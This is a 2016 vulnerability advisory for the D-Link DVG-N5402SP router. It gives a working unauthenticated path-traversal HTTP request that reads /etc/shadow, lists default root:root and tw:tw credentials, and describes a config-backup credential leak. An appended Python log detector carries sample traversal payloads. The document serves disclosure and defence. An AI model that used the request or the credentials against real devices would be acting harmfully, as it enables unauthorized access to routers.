D-Link DVG-N5402SP Path Traversal / Information Disclosure
Posted on 04 February 2016
D-Link DVG-N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities

*Timelines*

Reported to CERT + Vendor: August 2015
D-Link released beta release: Oct 23, 2015
New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb
No public disclosure till date - D-Link waiting for service providers to ask for the new release + CERT opted out

*Vulnerable Models, Firmware, Hardware versions*

DVG-N5402SP Web Management
Model Name: GPN2.4P21CCN
Firmware Version: W1000CN00
Firmware Version: W1000CN03
Firmware Version: W2000EN00
Hardware Platform: ZS
Hardware Version: Gpn2.4P21C_WIFIV0.05

The device can be managed through three users:
1. super - full privileges
2. admin - full privileges
3. support - restricted user

*1. Path traversal*

*CVE-ID*: CVE-2015-7245

Arbitrary files can be read off the device file system by supplying a traversal sequence in the errorpage parameter of the webproc CGI. No authentication is required to exploit this vulnerability.

*HTTP Request*

POST /cgi-bin/webproc HTTP/1.1
Host: <IP>:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<IP>:8080/cgi-bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223

getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

*HTTP Response*

HTTP/1.0 200 OK
pstVal->name:getpage; pstVal->value:html/main.html
pstVal->name:getpage; pstVal->value:html/index.html
pstVal->name:errorpage; pstVal->value:../../../../../../../../../../../etc/shadow
pstVal->name:var:menu; pstVal->value:setup
pstVal->name:var:page; pstVal->value:connected
pstVal->name:var:subpage; pstVal->value:
pstVal->name:objaction; pstVal->value:auth
pstVal->name::username; pstVal->value:super
pstVal->name::password; pstVal->value:super
pstVal->name::action; pstVal->value:login
pstVal->name::sessionid; pstVal->value:1ac5da6b
Connection: close
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=1ac5da6b; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

#root:<hash_redacted>:13796:0:99999:7:::
root:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::

*2. Use of Default, Hard-Coded Credentials*

*CVE-ID*: CVE-2015-7246

The device has two system user accounts configured with default passwords (root:root, tw:tw). The tw login is not active, though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled), leading to loss of integrity, confidentiality, or availability.

*3. Sensitive info leakage via device running configuration backup*

*CVE-ID*: CVE-2015-7247

Usernames, passwords, keys, values and web account hashes (super & admin) are stored in cleartext and not masked. It is noted that the restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin credentials, and gain full, unauthorized access to the device.

--
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in
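Detection example for the path-traversal issue in section 1, added here as an editor's example and not part of the advisory or the vendor's code. It parses reverse-proxy or IDS records of POST bodies sent to the webproc CGI, percent-decodes each form field repeatedly so that single- and double-encoded traversal sequences collapse to the same form, and flags any parameter whose value contains a `..` path segment. The log line format, the source addresses, and the assumption that the CGI path ends in `/webproc` are constructed for the example; only the parameter name and the traversal value mirror the advisory's request.

```python
"""Flag webproc form submissions carrying directory-traversal sequences.

Added example for CVE-2015-7245 style requests; the log format below is
constructed for illustration and is not a format the device itself emits.
"""
import re
from urllib.parse import parse_qsl, unquote

# Assumption: the management CGI path ends in "/webproc" (per the advisory's
# request line); matching on the suffix tolerates differing path prefixes.
WATCHED_SUFFIX = "/webproc"

# A ".." segment bounded by start/end of string or a path separator, checked
# after backslashes are normalised to "/". "a..b" or "..." do not match.
TRAVERSAL_SEGMENT = re.compile(r"(^|/)\.\.($|/)")

# Constructed record shape: '<src> <METHOD> <path> "<form body>"'.
LOG_LINE = re.compile(r'^(?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "(?P<body>[^"]*)"$')


def _fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %2e%2e%2f and %252e... both become '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_params(body: str) -> dict:
    """Return {param_name: decoded_value} for every field containing a '..' segment."""
    hits = {}
    # parse_qsl performs one round of decoding; _fully_decode handles the rest.
    for name, raw in parse_qsl(body, keep_blank_values=True):
        value = _fully_decode(raw).replace("\\", "/")
        if TRAVERSAL_SEGMENT.search(value):
            hits[_fully_decode(name)] = value
    return hits


def scan_log(lines) -> list:
    """Return (src, param, decoded_value) for each traversal attempt against webproc."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if not path.endswith(WATCHED_SUFFIX):
            continue
        for param, value in traversal_params(m["body"]).items():
            findings.append((m["src"], param, value))
    return findings


# Constructed sample records (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 POST /cgi-bin/webproc "getpage=html%2Findex.html&*errorpage*=../../../../../../etc/shadow&objaction=auth"',
    '192.0.2.11 POST /cgi-bin/webproc "getpage=html%2Findex.html&errorpage=html%2Ferror.html&objaction=auth"',
    '192.0.2.12 POST /cgi-bin/webproc "errorpage=%252e%252e%252f%252e%252e%252fetc%252fpasswd"',
    '192.0.2.13 GET /images/logo.png ""',
]

if __name__ == "__main__":
    for src, param, value in scan_log(SAMPLE_LOG):
        print(f"traversal attempt from {src}: {param}={value}")
```

The second sample record is a benign request with the same parameter names and is not flagged, which is the point of matching on a bounded `..` segment rather than on the string `..` anywhere: a rule that fires on every webproc POST is unusable on a device whose normal UI sends `errorpage` with each login.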